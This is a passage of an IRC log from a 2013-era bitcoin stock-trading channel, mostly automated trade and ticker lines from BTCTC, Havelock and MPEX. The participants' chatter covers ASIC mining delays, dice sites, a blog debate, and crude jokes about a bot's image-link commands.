0.0335 = 0.134 BTC [+] Jun 24 19:24:38 [HAVELOCK] [ASICM] 15 @ 0.0338 = 0.507 BTC [+] Jun 24 19:32:09 [HAVELOCK] [ASICM] 10 @ 0.0338 = 0.338 BTC [+] Jun 24 19:46:22 [BTCTC] [DMS.MINING] 6 @ 0.0164 = 0.0984 BTC [-] Jun 24 19:46:59 [BTCTC] [ASICMINER-PT] 1 @ 3.399499 BTC [+] Jun 24 19:47:01 [BTCTC] [ASICMINER-PT] 1 @ 3.3995 BTC [+] Jun 24 19:47:03 [BTCTC] [ASICMINER-PT] 1 @ 3.399997 BTC [+] Jun 24 19:47:27 [HAVELOCK] [KCIM] 1 @ 1.05 BTC [+] Jun 24 19:53:26 [HAVELOCK] [ASICM] 3 @ 0.033979 = 0.1019 BTC [+] Jun 24 19:55:50 [BTCTC] [BASIC-MINING] 1 @ 1 BTC [-] Jun 24 19:56:17 [BTCTC] [BTC-BOND] 1 @ 0.00995 BTC [-] Jun 24 19:56:20 [BTCTC] [BASIC-MINING] 2 @ 1 = 2 BTC [-] Jun 24 19:56:23 [BTCTC] [BASIC-MINING] 2 @ 1.1 = 2.2 BTC [+] Jun 24 19:56:25 [BTCTC] [BASIC-MINING] 1 @ 1.111 BTC [+] Jun 24 19:57:17 [BTCTC] [ASICMINER-PT] 5 @ 3.38 = 16.9 BTC [-] Jun 24 20:01:45 ;;ticker Jun 24 20:02:14 .bait Jun 24 20:02:18 http://25.media.tumblr.com/tumblr_m0spuyycj11qezyuno1_1280.jpg Jun 24 20:02:54 bewbs Jun 24 20:03:15 [BTCTC] [ASICMINER-PT] 2 @ 3.399997 = 6.8 BTC [+] Jun 24 20:07:22 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [-] Jun 24 20:07:35 [BTCTC] [BITVPS] 90 @ 0.0014 = 0.126 BTC [+] Jun 24 20:07:35 [BTCTC] [BITVPS] 88 @ 0.0014 = 0.1232 BTC [+] Jun 24 20:09:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.034196 = 0.2394 BTC [-] Jun 24 20:12:07 [BTCTC] [DMS.PURCHASE] 35 @ 0.053963 = 1.8887 BTC [-] Jun 24 20:27:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.034196 = 0.2736 BTC [-] Jun 24 20:31:15 [BTCTC] [DMS.MINING] 4 @ 0.0162 = 0.0648 BTC [-] Jun 24 20:32:06 [BTCTC] [ASICMINER-PT] 3 @ 3.429 = 10.287 BTC [+] Jun 24 20:34:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.034196 = 0.171 BTC [-] Jun 24 20:35:15 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0033 = 0.0066 BTC [-] Jun 24 20:35:16 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003204 = 0.1602 BTC [-] Jun 24 20:35:18 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003203 = 0.0096 BTC [-] Jun 24 20:35:24 [BTCTC] [TAT.ASICMINER] 22 @ 0.034196 = 0.7523 BTC [-] Jun 24 20:35:44 [BTCTC] [TAT.ASICMINER] 22 @ 0.034195 = 0.7523 BTC [-] Jun 24 20:35:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.034196 BTC [+] Jun 24 20:36:43 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.003063 = 0.0827 BTC [-] Jun 24 20:36:45 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003052 = 0.0122 BTC [-] Jun 24 20:36:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002801 BTC [-] Jun 24 20:38:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.03435 = 0.1374 BTC [+] Jun 24 20:41:18 [BTCTC] [ASICMINER-PT] 2 @ 3.429 = 6.858 BTC [+] Jun 24 20:42:58 [BTCTC] [ASICMINER-PT] 1 @ 3.429 BTC [+] Jun 24 20:45:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.03435 = 0.0687 BTC [+] Jun 24 20:46:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 24 20:50:52 [BTCTC] [S.MPOE-PT] 11 @ 0.000777 = 0.0085 BTC [-] Jun 24 20:50:54 [BTCTC] [S.MPOE-PT] 6 @ 0.000777 = 0.0047 BTC [-] Jun 24 20:51:01 [MPEX] [S.MPOE] 3003 @ 0.00078886 = 2.3689 BTC [+] Jun 24 20:53:16 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.003 = 0.021 BTC [+] Jun 24 20:55:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.034389 = 0.1376 BTC [+] Jun 24 20:55:12 [HAVELOCK] [ASICM] 2 @ 0.03388 = 0.0678 BTC [-] Jun 24 20:55:32 [HAVELOCK] [ASICM] 16 @ 0.03300017 = 0.528 BTC [-] Jun 24 20:56:11 [HAVELOCK] [ASICM] 11 @ 0.03300016 = 0.363 BTC [-] Jun 24 20:56:23 [HAVELOCK] [ASICM] 7 @ 0.03300013 = 0.231 BTC [-] Jun 24 20:59:45 [MPEX] [S.MPOE] 6344 @ 0.00078988 = 5.011 BTC [+] Jun 24 20:59:47 [MPEX] [S.MPOE] 7500 @ 0.00078998 = 5.9249 BTC [+] Jun 24 20:59:53 [BTCTC] [BASIC-MINING] 14 @ 1.2 = 16.8 BTC [+] Jun 24 20:59:55 [BTCTC] [BASIC-MINING] 2 @ 1.249 = 2.498 BTC [+] Jun 24 20:59:56 [BTCTC] [BASIC-MINING] 2 @ 1.25 = 2.5 BTC [+] Jun 24 20:59:57 [BTCTC] [BASIC-MINING] 1 @ 1.260001 BTC [+] Jun 24 20:59:58 [BTCTC] [BASIC-MINING] 1 @ 1.345 BTC [+] Jun 24 21:00:00 [MPEX] [S.MPOE] 4356 @ 0.00079027 = 3.4424 BTC [+] Jun 24 21:03:08 .bait Jun 24 21:03:12 http://24.media.tumblr.com/tumblr_malyuwzGOG1r51124o1_1280.jpg Jun 24 21:03:22 2/10 Jun 24 21:04:00 [MPEX] [S.MPOE] 3794 @ 0.00079027 = 2.9983 BTC [+] Jun 24 21:04:02 [MPEX] [S.MPOE] 3806 @ 0.00079111 = 3.011 BTC [+] Jun 24 21:07:58 [MPEX] [S.MPOE] 4505 @ 0.00078886 = 3.5538 BTC [-] Jun 24 21:13:37 http://youtu.be/X2XnF9cZypA Jun 24 21:13:39 MadBitcoins! speech to the Third Bitcoin Army - YouTube Jun 24 21:13:48 i'm not even sure what i'm watching Jun 24 21:14:46 [HAVELOCK] [ASICM] 1 @ 0.03388 BTC [+] Jun 24 21:18:41 [MPEX] [S.MPOE] 1276 @ 0.00078886 = 1.0066 BTC [-] Jun 24 21:18:43 [MPEX] [S.MPOE] 5333 @ 0.00078567 = 4.19 BTC [-] Jun 24 21:18:56 [MPEX] [S.MPOE] 3900 @ 0.00078518 = 3.0622 BTC [-] Jun 24 21:20:43 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [+] Jun 24 21:21:39 [BTCTC] [S.MPOE-PT] 1 @ 0.000777 BTC [-] Jun 24 21:21:55 ;;seen mircea_popescu Jun 24 21:22:03 mircea_popescu: I want more credits Jun 24 21:22:12 .boobs Jun 24 21:24:48 [BTCTC] [BITVPS] 12 @ 0.0014 = 0.0168 BTC [+] Jun 24 21:26:19 [BTCTC] [BITVPS] 11 @ 0.001455 = 0.016 BTC [+] Jun 24 21:28:39 [BTCTC] [RSM] 1 @ 0.02315 BTC [-] Jun 24 21:29:31 [BTCTC] [B.YABMC] 4 @ 0.004 = 0.016 BTC [-] Jun 24 21:30:12 [BTCTC] [DMS.MINING] 1 @ 0.0158 BTC [-] Jun 24 21:35:13 .bait Jun 24 21:35:17 http://25.media.tumblr.com/tumblr_mb7ytyIWuM1qcl26zo1_500.jpg Jun 24 21:37:23 [HAVELOCK] [SDICE] 20 @ 0.20021 = 4.0042 BTC [+] Jun 24 21:37:39 [HAVELOCK] [SDICE] 10 @ 0.2002 = 2.002 BTC [-] Jun 24 21:37:50 [BTCTC] [S.DICE-PT] 90 @ 0.002498 = 0.2248 BTC [+] Jun 24 21:37:52 [BTCTC] [S.DICE-PT] 4 @ 0.002548 = 0.0102 BTC [+] Jun 24 21:37:53 [BTCTC] [S.DICE-PT] 35 @ 0.002548 = 0.0892 BTC [+] Jun 24 21:38:07 [HAVELOCK] [SDICE] 1 @ 0.2002 BTC [-] Jun 24 21:38:08 [HAVELOCK] [SDICE] 1 @ 0.20010003 BTC [-] Jun 24 21:38:09 [HAVELOCK] [SDICE] 10 @ 0.20001001 = 2.0001 BTC [-] Jun 24 21:38:10 [HAVELOCK] [SDICE] 2 @ 0.20000002 = 0.4 BTC [-] Jun 24 21:38:11 [HAVELOCK] [SDICE] 3 @ 0.2 = 0.6 BTC [-] Jun 24 21:39:23 [BTCTC] [DMS.SELLING] 1 @ 0.0375 BTC [-] Jun 24 21:52:20 [BTCTC] [DMS.SELLING] 2 @ 0.038499 = 0.077 BTC [+] Jun 24 21:54:26 thestringpuller: i haz credits, what's the going rate? Jun 24 21:57:01 How to check a certain ticker Jun 24 21:57:09 On btct from here Jun 24 22:05:19 [BTCTC] [DMS.MINING] 1 @ 0.0164 BTC [+] Jun 24 22:09:11 [HAVELOCK] [ASICM] 3 @ 0.03300022 = 0.099 BTC [-] Jun 24 22:09:12 [HAVELOCK] [ASICM] 133 @ 0.03300013 = 4.389 BTC [-] Jun 24 22:09:13 [HAVELOCK] [ASICM] 100 @ 0.03300012 = 3.3 BTC [-] Jun 24 22:09:15 [HAVELOCK] [ASICM] 2 @ 0.03300011 = 0.066 BTC [-] Jun 24 22:09:16 [HAVELOCK] [ASICM] 500 @ 0.033 = 16.5 BTC [-] Jun 24 22:09:17 [HAVELOCK] [ASICM] 1 @ 0.033 BTC [-] Jun 24 22:12:44 [HAVELOCK] [ASICM] 11 @ 0.033 = 0.363 BTC [-] Jun 24 22:14:21 [BTCTC] [DMS.SELLING] 10 @ 0.038 = 0.38 BTC [-] Jun 24 22:14:22 [BTCTC] [DMS.SELLING] 10 @ 0.0385 = 0.385 BTC [+] Jun 24 22:14:24 [BTCTC] [DMS.SELLING] 7 @ 0.039 = 0.273 BTC [+] Jun 24 22:17:04 [BTCTC] [TAT.ASICMINER] 16 @ 0.03438 = 0.5501 BTC [-] Jun 24 22:17:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.034387 = 0.1375 BTC [+] Jun 24 22:18:07 [MPEX] [S.MPOE] 5741 @ 0.00078476 = 4.5053 BTC [-] Jun 24 22:20:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.033533 = 0.1006 BTC [-] Jun 24 22:21:02 [BTCTC] [DMS.SELLING] 25 @ 0.039 = 0.975 BTC [+] Jun 24 22:21:16 [BTCTC] [RSM] 9 @ 0.02315 = 0.2084 BTC [-] Jun 24 22:22:27 !t bt tat.asicminer Jun 24 22:22:40 [BTCT:TAT.ASICMINER] 1D: 0.03112 / 0.03371 / 0.035 (4212 shares, 142 BTC), 7D: 0.025121 / 0.03002 / 0.035 (30956 shares, 929.3 BTC), 30D: 0.021 / 0.0268 / 0.035 (104384 shares, 2797.2 BTC) Jun 24 22:22:50 !l bt tat.asicminer Jun 24 22:22:50 Last trade for TAT.ASICMINER on BTCTC was at 0.033533 BTC [-] Jun 24 22:22:59 arij ^^ Jun 24 22:23:45 [BTCTC] [DMS.PURCHASE] 100 @ 0.053963 = 5.3963 BTC [-] Jun 24 22:24:03 quotes are boring Jun 24 22:24:17 boobies, they are much better Jun 24 22:24:19 .bait Jun 24 22:24:37 http://25.media.tumblr.com/tumblr_m9oobnprSy1r1c1lbo1_500.jpg Jun 24 22:24:37 [HAVELOCK] [ASICM] 1 @ 0.033879 BTC [+] Jun 24 22:24:42 [HAVELOCK] [ASICM] 5 @ 0.033879 = 0.1694 BTC [+] Jun 24 22:24:52 [HAVELOCK] [ASICM] 10 @ 0.033879 = 0.3388 BTC [+] Jun 24 22:25:01 [HAVELOCK] [ASICM] 5 @ 0.033879 = 0.1694 BTC [+] Jun 24 22:25:10 [HAVELOCK] [ASICM] 3 @ 0.033879 = 0.1016 BTC [+] Jun 24 22:25:52 .boobies Jun 24 22:25:56 http://25.media.tumblr.com/tumblr_mcgoo74FDv1rn3jhgo1_500.png Jun 24 22:26:04 aw shit, that works too Jun 24 22:26:09 .boobies Jun 24 22:26:13 http://25.media.tumblr.com/tumblr_m28kkgkgpb1rtsmbxo1_500.jpg Jun 24 22:26:27 totally not boobies Jun 24 22:26:28 no tits anywhere Jun 24 22:26:29 totally not boobies Jun 24 22:26:31 .boobies Jun 24 22:26:35 http://25.media.tumblr.com/tumblr_m7semhXEu51rwmmjmo1_500.jpg Jun 24 22:26:43 apparently the boob/butt differentiation algorithm can be perfected Jun 24 22:26:49 btw this aint just-tits.com Jun 24 22:26:54 there we go Jun 24 22:26:55 so play in private Jun 24 22:26:58 heh Jun 24 22:27:11 kakobrekla: buy me netflix Jun 24 22:27:15 the .bait stuff works over pm also gents Jun 24 22:27:27 [BTCTC] [S.MPOE-PT] 5 @ 0.000777 = 0.0039 BTC [-] Jun 24 22:27:29 kakobrekla: please change the topic to reflect the change of orientation Jun 24 22:27:31 :-) Jun 24 22:27:41 davout: maybe the algorithm has prediction capabilities that go beyond what one asks Jun 24 22:28:06 [15:27] the .bait stuff works over pm also gents << lol, Jezz gets to know when someone is wanking Jun 24 22:28:29 hahahahaha Jun 24 22:28:33 lol, someone is _always_ wanking Jun 24 22:28:37 not that interesting tbh :) Jun 24 22:28:59 with as much porn as ozbot serves up, it's a miracle he gets any work done whatsoever Jun 24 22:29:24 too bad tumblr can't be accessed any other way Jun 24 22:29:43 shame innit? Jun 24 22:32:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.0343 = 0.1029 BTC [+] Jun 24 22:32:55 !t bt bitvps Jun 24 22:33:03 Hmm Jun 24 22:33:11 [BTCT:BITVPS] 1D: 0.001199 / 0.0013 / 0.001455 (1180 shares, 1.5 BTC), 7D: 0.000668 / 0.00103 / 0.0017 (14127 shares, 14.5 BTC), 30D: 0.00036 / 0.00075 / 0.0017 (63635 shares, 47.6 BTC) Jun 24 22:39:07 [BTCTC] [DMS.PURCHASE] 51 @ 0.053963 = 2.7521 BTC [-] Jun 24 22:45:33 [BTCTC] [ASICMINER-PT] 1 @ 3.4099 BTC [-] Jun 24 22:46:03 http://trilema.com/2013/in-re-noobs-and-conventions/#comment-93676 Jun 24 22:46:06 In re noobs and conventions pe Trilema - Un blog de Mircea Popescu. Jun 24 22:46:07 we are having a debate no less! Jun 24 22:46:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 24 22:46:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.033903 = 0.1695 BTC [-] Jun 24 22:46:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [-] Jun 24 22:46:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [-] Jun 24 22:46:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0338 BTC [-] Jun 24 22:46:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.0338 = 0.2028 BTC [-] Jun 24 22:46:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.033702 = 1.6851 BTC [-] Jun 24 22:46:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.033525 = 0.2012 BTC [-] Jun 24 22:46:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.033501 = 0.067 BTC [-] Jun 24 22:46:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0335 BTC [-] Jun 24 22:46:26 [BTCTC] [TAT.ASICMINER] 45 @ 0.033052 = 1.4873 BTC [-] Jun 24 22:46:28 [BTCTC] [TAT.ASICMINER] 65 @ 0.033051 = 2.1483 BTC [-] Jun 24 22:46:36 [BTCTC] [TAT.ASICMINER] 21 @ 0.033051 = 0.6941 BTC [-] Jun 24 22:46:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.0342 = 0.0684 BTC [+] Jun 24 22:46:41 [HAVELOCK] [VTX] 1 @ 0.444 BTC [-] Jun 24 22:46:42 [HAVELOCK] [VTX] 20 @ 0.4445 = 8.89 BTC [+] Jun 24 22:47:09 lol Jun 24 22:47:17 but, but "now they both work at Laissez-Faire Books" Jun 24 22:47:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 24 22:47:36 and they are OBSESSED with bitcoin Jun 24 22:48:14 how does one become a leading legal theoretician? Jun 24 22:48:37 oh, by having several conversations with Peter Jun 24 22:48:39 apparently by being obsesses with la law Jun 24 22:48:54 to quote, "jesus christ he seriously thinks that's an exception to "talking about it doesn't make you part of it"?!?" Jun 24 22:49:10 "Cathy I don’t know." Jun 24 22:49:15 so good Jun 24 22:49:27 .cathy Jun 24 22:49:52 We are bloggers, we are activists, we are talking, we are bitcoin. Jun 24 22:50:00 [BTCTC] [ASICMINER-PT] 5 @ 3.4099 = 17.0495 BTC [-] Jun 24 22:51:05 .boobs Jun 24 22:51:16 .boobies Jun 24 22:51:25 http://25.media.tumblr.com/tumblr_m9gh0qajyg1qaygrmo1_1280.jpg Jun 24 22:51:33 lets see how advanced it is Jun 24 22:51:35 .feet Jun 24 22:51:41 [BTCTC] [ASICMINER-PT] 5 @ 3.4099 = 17.0495 BTC [-] Jun 24 22:51:49 .poop Jun 24 22:51:53 tghe boobies one has no boobies in it Jun 24 22:51:59 scams Jun 24 22:52:00 i suspect this machine does not understand fucking. Jun 24 22:54:20 so guys i was thinking... i've been drinking wine for abotu two decades now or so. Jun 24 22:54:27 i think i'm going to hold the worlds first wine conference Jun 24 22:54:34 any of you want to come ? half price. Jun 24 22:54:38 only 100 bux. Jun 24 22:54:48 [BTCTC] [ASICMINER-PT] 2 @ 3.4259 = 6.8518 BTC [+] Jun 24 22:54:50 [BTCTC] [ASICMINER-PT] 6 @ 3.426 = 20.556 BTC [+] Jun 24 22:55:21 if it's in Atlanta, i'm there Jun 24 22:55:45 [BTCTC] [ASICMINER-PT] 1 @ 3.428999 BTC [+] Jun 24 22:55:47 [BTCTC] [ASICMINER-PT] 4 @ 3.429 = 13.716 BTC [+] Jun 24 22:55:49 [BTCTC] [ASICMINER-PT] 1 @ 3.43 BTC [+] Jun 24 22:55:50 [BTCTC] [ASICMINER-PT] 4 @ 3.43 = 13.72 BTC [+] Jun 24 22:55:51 in all my years of drinking I have learned one definite thing about wine Jun 24 22:55:52 [BTCTC] [ASICMINER-PT] 6 @ 3.43 = 20.58 BTC [+] Jun 24 22:55:52 ThickAsThieves: is in atlanta too Jun 24 22:55:52 lol god damn it Jun 24 22:55:55 I prefer Malbec Jun 24 22:56:29 [BTCTC] [ASICMINER-PT] 1 @ 3.439 BTC [+] Jun 24 22:57:09 [BTCTC] [ASICMINER-PT] 1 @ 3.439 BTC [+] Jun 24 22:57:11 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [+] Jun 24 22:57:13 [BTCTC] [ASICMINER-PT] 4 @ 3.44 = 13.76 BTC [+] Jun 24 22:57:14 [BTCTC] [ASICMINER-PT] 4 @ 3.44 = 13.76 BTC [+] Jun 24 22:57:16 [BTCTC] [ASICMINER-PT] 4 @ 3.44 = 13.76 BTC [+] Jun 24 22:57:23 come to papa Jun 24 22:57:32 heh Jun 24 22:58:04 if it's in ATL i'm there Jun 24 22:58:07 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [-] Jun 24 22:58:13 like a 2 hour drive for me Jun 24 22:58:15 mircea_popescu: ಠ_ಠ Jun 24 22:58:20 [MPEX] [S.DICE] 94392 @ 0.002 = 188.784 BTC [-] Jun 24 22:58:22 my sarcasm ;/ Jun 24 22:58:32 dude that's a lot of support for s.dice at 2 Jun 24 22:58:37 [BTCTC] [ASICMINER-PT] 6 @ 3.45 = 20.7 BTC [+] Jun 24 22:58:37 !ticker m s.dice Jun 24 22:58:39 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [+] Jun 24 22:58:40 [MPEX:S.DICE] 1D: 0.002 / 0.00200309 / 0.0022 (96892 shares, 194.08 BTC), 7D: 0.002 / 0.00200077 / 0.0022 (787442 shares, 1,575.49 BTC), 30D: 0.00179 / 0.0019814 / 0.00296096 (3271557 shares, 6,482.30 BTC) Jun 24 22:58:40 [BTCTC] [ASICMINER-PT] 2 @ 3.46 = 6.92 BTC [+] Jun 24 22:58:42 [BTCTC] [ASICMINER-PT] 6 @ 3.46 = 20.76 BTC [+] Jun 24 22:58:58 like 3mn shares past ~2 weeks Jun 24 22:59:44 da fuck the dice site is up 210 Jun 24 22:59:54 like 3.x the edge Jun 24 23:01:41 [HAVELOCK] [ASICM] 3 @ 0.0334 = 0.1002 BTC [-] Jun 24 23:01:53 huh? Jun 24 23:02:07 [HAVELOCK] [ASICM] 11 @ 0.033877 = 0.3726 BTC [+] Jun 24 23:04:40 !ticker h asicm Jun 24 23:04:42 [HAVELOCK:ASICM] 1D: 0.02930000 / 0.03223564 / 0.03447799 (9038 shares, 291.34570972 BTC), 7D: 0.02500000 / 0.02959982 / 0.03447799 (53466 shares, 1582.58379794 BTC), 30D: 0.02310000 / 0.02666779 / 0.03447799 (242922 shares, 6478.19197257 BTC) Jun 24 23:05:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.0338 = 0.1014 BTC [-] Jun 24 23:05:11 [BTCTC] [TAT.ASICMINER] 37 @ 0.033899 = 1.2543 BTC [+] Jun 24 23:05:22 !ticker b tat.asicminer Jun 24 23:05:23 The eagle never lost so much time as when he submitted to learn from the crow. Jun 24 23:05:29 !ticker btctc tat.asicminer Jun 24 23:05:31 [BTCT:TAT.ASICMINER] 1D: 0.03112 / 0.03373 / 0.035 (4257 shares, 143.6 BTC), 7D: 0.025121 / 0.03004 / 0.035 (31162 shares, 936.2 BTC), 30D: 0.021 / 0.02681 / 0.035 (104590 shares, 2804.1 BTC) Jun 24 23:05:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.033899 = 0.1695 BTC [+] Jun 24 23:07:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003449 BTC [+] Jun 24 23:08:17 [BTCTC] [TAT.ASICMINER] 8 @ 0.033899 = 0.2712 BTC [+] Jun 24 23:09:43 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.003449 = 0.169 BTC [+] Jun 24 23:10:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003449 BTC [+] Jun 24 23:10:46 [BTCTC] [TAT.ASICMINER] 61 @ 0.0339 = 2.0679 BTC [+] Jun 24 23:10:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.034 = 0.068 BTC [+] Jun 24 23:11:12 mircea_popescu: I have the same profit as him with 5 times the bet volume Jun 24 23:11:21 dooglus: how many virgins did you sacrifice to the RNG gods Jun 24 23:11:33 Scrat which one's yours ? i forget. Jun 24 23:11:40 coinroll.it Jun 24 23:12:05 ah ah Jun 24 23:12:16 [BTCTC] [TAT.VIRTUALMINE] 173 @ 0.00345 = 0.5969 BTC [+] Jun 24 23:16:08 [BTCTC] [ASICMINER-PT] 1 @ 3.466999 BTC [+] Jun 24 23:16:10 [BTCTC] [ASICMINER-PT] 3 @ 3.467 = 10.401 BTC [+] Jun 24 23:19:40 https://petitions.whitehouse.gov/petition/allow-tesla-motors-sell-directly-consumers-all-50-states/bFN7NHQR Jun 24 23:19:44 allow Tesla Motors to sell directly to consumers in all 50 states. | We the People: Your Voice in Ou Jun 24 23:24:49 [HAVELOCK] [ASICM] 3 @ 0.03300003 = 0.099 BTC [-] Jun 24 23:25:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.034 = 0.102 BTC [+] Jun 24 23:25:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.034 = 0.34 BTC [+] Jun 24 23:25:59 [HAVELOCK] [ASICM] 45 @ 0.033875 = 1.5244 BTC [+] Jun 24 23:26:11 [HAVELOCK] [ASICM] 118 @ 0.03300003 = 3.894 BTC [-] Jun 24 23:27:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.034 = 0.85 BTC [+] Jun 24 23:27:08 [BTCTC] [TAT.ASICMINER] 21 @ 0.033801 = 0.7098 BTC [-] Jun 24 23:27:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0338 BTC [-] Jun 24 23:27:11 [BTCTC] [TAT.ASICMINER] 84 @ 0.0338 = 2.8392 BTC [-] Jun 24 23:27:28 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1998 BTC [+] Jun 24 23:27:36 [BTCTC] [TAT.ASICMINER] 22 @ 0.0338 = 0.7436 BTC [-] Jun 24 23:27:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.0337 BTC [-] Jun 24 23:27:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.033 = 0.066 BTC [-] Jun 24 23:31:15 [BTCTC] [S.MPOE-PT] 88 @ 0.000777 = 0.0684 BTC [-] Jun 24 23:34:25 [BTCTC] [ASICMINER-PT] 1 @ 3.4659 BTC [-] Jun 24 23:35:10 [BTCTC] [ASICMINER-PT] 1 @ 3.466 BTC [+] Jun 24 23:35:47 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.003484 = 0.0244 BTC [+] Jun 24 23:35:48 [BTCTC] [TAT.VIRTUALMINE] 93 @ 0.003485 = 0.3241 BTC [+] Jun 24 23:36:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.034191 = 0.3077 BTC [+] Jun 24 23:37:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.03419 = 0.3761 BTC [-] Jun 24 23:37:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.0342 = 0.1368 BTC [+] Jun 24 23:37:39 [BTCTC] [TAT.ASICMINER] 35 @ 0.0342 = 1.197 BTC [+] Jun 24 23:38:39 https://bitcointalk.org/index.php?topic=144622.msg2556834#msg2556834 Jun 24 23:38:48 [BitFunder] G.MPOE Pass Through Jun 24 23:38:50 so is bitfunder in trouble or what is that ? Jun 24 23:38:57 Ukto ^ Jun 24 23:39:08 [BTCTC] [TAT.VIRTUALMINE] 65 @ 0.003485 = 0.2265 BTC [+] Jun 24 23:41:59 [BTCTC] [ASICMINER-PT] 1 @ 3.466 BTC [+] Jun 24 23:42:47 dude 12 year olds are good at skurity Jun 24 23:42:52 so dun worry Jun 24 23:43:29 [BTCTC] [S.BBET-PT] 1 @ 0.0015 BTC [-] Jun 24 23:43:32 weexchange just smells Jun 24 23:44:14 [BTCTC] [CRYPTO-TRADE] 10 @ 0.195 = 1.95 BTC [-] Jun 24 23:44:24 it will get hacked, if not already Jun 24 23:44:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00349 BTC [+] Jun 24 23:44:36 no mann because ozcoin Jun 24 23:46:04 [BTCTC] [BITVPS] 100 @ 0.001456 = 0.1456 BTC [+] Jun 24 23:47:03 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [-] Jun 24 23:47:05 [BTCTC] [ASICMINER-PT] 1 @ 3.430001 BTC [-] Jun 24 23:49:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00349 BTC [+] Jun 24 23:49:06 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.003201 = 0.1601 BTC [-] Jun 24 23:49:07 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0032 = 0.032 BTC [-] Jun 24 23:49:19 "Unfortunately the chip does not perform as planned. We optimistically assumed a hashrate of 3.5GH/s at 0.6V. The chip is 2 times slower and if overclocked can run at 2GH/s. Further overclocking would be to expensive in terms of hardware prices (power supply). Jun 24 23:49:19 Because of the lower hash rate we will have problems to deliver the full 104TH/s performance in the next weeks. Only 35296 chips are expected to be available for the mine next week. This corresponds to only 70TH/s. We are still waiting for the other packaging company to provide us with the estimation of the date for the completion of packaging. Jun 24 23:49:19 We expect a delay of 1-2 weeks in launching the mine. We assume the initial launch will include only 70TH/s and few days later additional 34TH/s will be installed." Jun 24 23:49:27 why is everyone copying bfl ;/ Jun 24 23:49:32 mircea_popescu: buy me netflix Jun 24 23:49:51 no Jun 24 23:49:52 [BTCTC] [PAJKA.BOND] 8 @ 0.048576 = 0.3886 BTC [-] Jun 24 23:50:05 I'll pay you double! Jun 24 23:50:13 mircea_popescu: who is that? Jun 24 23:50:15 Whatever their paying you I'll double it!!!! Jun 24 23:50:21 "We expect a delay of 1-2 weeks" Jun 24 23:50:23 yep Jun 24 23:50:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.033001 = 0.66 BTC [-] Jun 24 23:50:55 time moves so fast in bitcoin land that 2 weeks is an eternity Jun 24 23:50:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.033 = 0.33 BTC [-] Jun 24 23:50:59 [BTCTC] [TAT.ASICMINER] 50 @ 0.032903 = 1.6452 BTC [-] Jun 24 23:51:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0329 = 0.329 BTC [-] Jun 24 23:51:04 kinda true Jun 24 23:51:08 mircea_popescu source? Jun 24 23:51:10 dub the picostocks thing Jun 24 23:51:10 4-6 weeks is the standard asic delay though Jun 24 23:51:13 thats why 2weeks can turn to 2mos Jun 24 23:51:15 oh that scam Jun 24 23:51:19 https://bitcointalk.org/index.php?topic=140366.msg2540068#msg2540068 Jun 24 23:51:24 [PicoStocks] 100TH/s bitcoin mine [100th] Jun 24 23:51:26 its never 2mos tho Jun 24 23:51:31 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0035 = 0.175 BTC [+] Jun 24 23:51:42 I'm expecting BFL delivery in 4-6 weeks Jun 24 23:51:43 always 2 weeks + 2 weeks + 2 weeks + 2 weeks + 2 weeks Jun 24 23:51:44 etc Jun 24 23:51:44 pico? oh that was profitable, forsure Jun 24 23:51:48 myeah. Jun 24 